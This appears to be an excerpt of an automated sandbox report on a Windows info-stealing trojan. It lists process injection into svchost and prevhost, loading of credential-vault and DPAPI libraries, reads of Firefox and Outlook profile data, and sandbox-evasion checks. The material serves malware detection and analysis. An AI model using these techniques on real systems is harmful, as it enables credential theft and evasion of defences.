                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05169C325_2_05169C32
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AFCF25_2_051AFCF2
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AFF095_2_051AFF09
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F1F925_2_050F1F92
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AFFB15_2_051AFFB1
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F9EB05_2_050F9EB0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051859105_2_05185910
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0510B9505_2_0510B950
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F99505_2_050F9950
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0515D8005_2_0515D800
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F38E05_2_050F38E0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AFB765_2_051AFB76
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0510FB805_2_0510FB80
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05165BF05_2_05165BF0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0512DBF95_2_0512DBF9
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AFA495_2_051AFA49
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051A7A465_2_051A7A46
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05163A6C5_2_05163A6C
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05135AA05_2_05135AA0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0518DAAC5_2_0518DAAC
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0519DAC65_2_0519DAC6
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F61E605_2_02F61E60
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F513015_2_02F51301
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F5B0705_2_02F5B070
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F5B0655_2_02F5B065
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F637405_2_02F63740
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F6373B5_2_02F6373B
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F655405_2_02F65540
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F5CF405_2_02F5CF40
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F5AF205_2_02F5AF20
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F7BCD05_2_02F7BCD0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F5CD205_2_02F5CD20
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_04F5E4F65_2_04F5E4F6
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_04F5E88C5_2_04F5E88C
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_04F5D9585_2_04F5D958
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_04F5CBF85_2_04F5CBF8
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_04F5CBA75_2_04F5CBA7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 100 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 57 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 275 times
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: String function: 0052F9F2 appears 40 times
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: String function: 00530A30 appears 46 times
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: String function: 00519CB3 appears 31 times
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: String function: 050DB970 appears 275 times
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: String function: 05137E54 appears 99 times
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: String function: 0516F290 appears 105 times
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: String function: 05125130 appears 56 times
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: String function: 0515EA12 appears 86 times
                Source: 4sfN3Gx1vO.exe, 00000000.00000003.2084326425.0000000004053000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4sfN3Gx1vO.exe
                Source: 4sfN3Gx1vO.exe, 00000000.00000003.2083990526.00000000041FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4sfN3Gx1vO.exe
                Source: 4sfN3Gx1vO.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@4/4
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005837B5 GetLastError,FormatMessageW,0_2_005837B5
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005710BF AdjustTokenPrivileges,CloseHandle,0_2_005710BF
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_005716C3
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_005851CD
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0059A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0059A67C
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0058648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0058648E
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_005142A2
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeFile created: C:\Users\user\AppData\Local\Temp\autF2F0.tmpJump to behavior
                Source: 4sfN3Gx1vO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: prevhost.exe, 00000005.00000003.2578666068.0000000003280000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2581697269.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2578978579.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.00000000032CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 4sfN3Gx1vO.exeVirustotal: Detection: 72%
                Source: 4sfN3Gx1vO.exeReversingLabs: Detection: 76%
                Source: unknownProcess created: C:\Users\user\Desktop\4sfN3Gx1vO.exe "C:\Users\user\Desktop\4sfN3Gx1vO.exe"
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\4sfN3Gx1vO.exe"
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeProcess created: C:\Windows\SysWOW64\prevhost.exe "C:\Windows\SysWOW64\prevhost.exe"
                Source: C:\Windows\SysWOW64\prevhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\4sfN3Gx1vO.exe"Jump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeProcess created: C:\Windows\SysWOW64\prevhost.exe "C:\Windows\SysWOW64\prevhost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 4sfN3Gx1vO.exeStatic file information: File size 1245696 > 1048576
                Source: 4sfN3Gx1vO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 4sfN3Gx1vO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 4sfN3Gx1vO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 4sfN3Gx1vO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 4sfN3Gx1vO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 4sfN3Gx1vO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 4sfN3Gx1vO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: prevhost.pdb source: svchost.exe, 00000002.00000003.2361463674.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393024659.0000000002800000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315017656.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000003.2613211255.0000000000D4B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YZKoIsKkwLJWPq.exe, 00000004.00000000.2318966272.000000000070E000.00000002.00000001.01000000.00000005.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000000.2464236823.000000000070E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 4sfN3Gx1vO.exe, 00000000.00000003.2085536989.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2084894873.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303728732.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298004446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.000000000309E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2395059467.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.000000000524E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2393104487.0000000004D55000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 4sfN3Gx1vO.exe, 00000000.00000003.2085536989.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2084894873.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2393190825.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303728732.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298004446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.000000000309E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, prevhost.exe, 00000005.00000003.2395059467.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.000000000524E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2393104487.0000000004D55000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: prevhost.pdbGCTL source: svchost.exe, 00000002.00000003.2361463674.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393024659.0000000002800000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315017656.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000003.2613211255.0000000000D4B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: prevhost.exe, 00000005.00000002.3316055880.00000000056DC000.00000004.10000000.00040000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.000000000322A000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.00000000033AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2693373993.000000000874C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: prevhost.exe, 00000005.00000002.3316055880.00000000056DC000.00000004.10000000.00040000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.000000000322A000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.00000000033AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2693373993.000000000874C000.00000004.80000000.00040000.00000000.sdmp
                Source: 4sfN3Gx1vO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 4sfN3Gx1vO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 4sfN3Gx1vO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 4sfN3Gx1vO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 4sfN3Gx1vO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00530A76 push ecx; ret 0_2_00530A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E5AF5 push esp; iretd 2_2_024E5B02
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F1B0F push ss; iretd 2_2_024F1B6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F6383 push ds; iretd 2_2_024F6396
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F4853 push esp; retf 2_2_024F4856
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E4E5A push ebp; ret 2_2_024E4E98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E4EA3 push ebp; ret 2_2_024E4E98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F76A1 push cs; iretd 2_2_024F76AC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F8FE6 push ss; iretd 2_2_024F9007
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F94AA push ecx; iretd 2_2_024F94AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E3540 push eax; ret 2_2_024E3542
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F4563 push ebx; retf 2_2_024F457B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F450D push ebx; retf 2_2_024F457B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx2_2_02F309B6
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050E09AD push ecx; mov dword ptr [esp], ecx5_2_050E09B6
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F6886E push eax; retf 5_2_02F6885D
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F6C034 push ecx; retf 5_2_02F6C037
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F6415E push cs; iretd 5_2_02F64169
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F6C499 push ebp; retf 5_2_02F6C49A
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F5E5CC push ss; iretd 5_2_02F5E629
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F525B2 push esp; iretd 5_2_02F525BF
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F65AA3 push ss; iretd 5_2_02F65AC4
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F51960 push ebp; ret 5_2_02F51955
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F6B94F push FFFFFFDFh; ret 5_2_02F6B960
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F51917 push ebp; ret 5_2_02F51955
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F62E40 push ds; iretd 5_2_02F62E53
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F65F67 push ecx; iretd 5_2_02F65F6B
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F6BCD5 pushad ; iretd 5_2_02F6BCD8
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_04F5D50D push esp; ret 5_2_04F5D50E
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_04F54708 push edi; retf 5_2_04F54709
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_04F5D272 push ecx; ret 5_2_04F5D273
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0052F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0052F98E
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_005A1C41
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98643
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeAPI/Special instruction interceptor: Address: 1603C94
                Source: C:\Windows\SysWOW64\prevhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\prevhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\prevhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\prevhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\prevhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\prevhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\prevhost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\prevhost.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: 4sfN3Gx1vO.exe, 00000000.00000003.2058384684.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2086984348.0000000001605000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058889356.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2057850030.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2061991495.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058146418.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000002.2087777938.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058721100.000000000160C000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2074661232.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2058613766.000000000160C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
                Source: C:\Windows\SysWOW64\prevhost.exeWindow / User API: threadDelayed 9743Jump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeAPI coverage: 4.2 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\prevhost.exeAPI coverage: 2.8 %
                Source: C:\Windows\SysWOW64\prevhost.exe TID: 3032Thread sleep count: 230 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exe TID: 3032Thread sleep time: -460000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exe TID: 3032Thread sleep count: 9743 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exe TID: 3032Thread sleep time: -19486000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\prevhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0057DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0057DBBE
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0054C2A2 FindFirstFileExW,0_2_0054C2A2
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005868EE FindFirstFileW,FindClose,0_2_005868EE
